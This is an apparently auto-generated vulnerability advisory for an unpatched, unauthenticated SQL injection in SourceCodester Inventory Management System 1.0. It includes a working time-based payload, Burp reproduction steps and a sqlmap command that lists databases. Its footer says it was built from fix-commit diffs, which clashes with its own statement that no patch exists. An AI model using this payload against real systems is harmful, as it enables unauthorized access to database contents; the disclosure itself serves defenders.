SourceCodester Free and Open Source Inventory Management System sql injection
Description
A vulnerability was found in SourceCodester Free and Open Source Inventory Management System 1.0. It has been classified as critical. Affected is an unknown function of the file /index.php?page=member. The manipulation of the argument columns[0][data] leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-237570 is the identifier assigned to this vulnerability.
Affected products
1- Range: 1.0
Patches
0No patches discovered yet.
Vulnerability mechanics
Root cause
"Missing input sanitization in the `columns[0][data]` parameter allows SQL injection."
Attack vector
An attacker sends a crafted POST request to the member page endpoint, replacing the value of the `columns[0][data]` parameter with a SQL injection payload. The advisory demonstrates a time-based blind injection using `(select*from(select+sleep(3)union/**/select+1)a)` [ref_id=1]. The attack is unauthenticated and can be launched remotely over HTTP. The parameter is not sanitized before being used in a SQL query, allowing the attacker to extract database contents.
Affected code
The vulnerable endpoint is `/index.php?page=member` in the Free and Open Source Inventory Management System 1.0. The injection occurs in the `columns[0][data]` parameter of a POST request that the member page sends to retrieve customer data [ref_id=1]. The exact server-side function handling this parameter is not named in the advisory.
What the fix does
No patch is provided in the advisory. The researcher only documents the discovery and verification of the blind SQL injection using manual testing and sqlmap [ref_id=1]. To remediate, the application should use parameterized queries or prepared statements for the `columns[0][data]` parameter, and all user-supplied input should be validated and sanitized before being included in SQL queries.
Preconditions
- networkThe attacker must be able to send HTTP POST requests to the /index.php?page=member endpoint.
- authNo authentication is required; the vulnerable page is accessible without logging in.
Reproduction
1. Set up the environment: extract the PHP source code, create a MySQL database named "ample", import `ample/database/ample.sql`, and configure `ample/app/config/config.php` with database credentials [ref_id=1]. 2. Navigate to `http://ample/index.php?page=member` and use Burp Suite to capture the second POST request that loads customer data. 3. Replace the value of `columns%5B0%5D%5Bdata%5D` with the URL-encoded payload `%28select%2Afrom%28select%2Bsleep%283%29union%2F%2A%2A%2Fselect%2B1%29a%29` and forward the request. 4. Observe a 3-second delay and "No matching records found" in the response, confirming time-based blind SQL injection [ref_id=1]. 5. For automated verification, save the request to a file, replace the parameter value with `*`, and run `sqlmap -r "payload" --dbs --level 3` [ref_id=1].
Generated on May 24, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
3- github.com/Jacky-Y/vuls/blob/main/README.mdmitreexploit
- vuldb.commitresignaturepermissions-required
- vuldb.commitrevdb-entrytechnical-description
News mentions
0No linked articles in our index yet.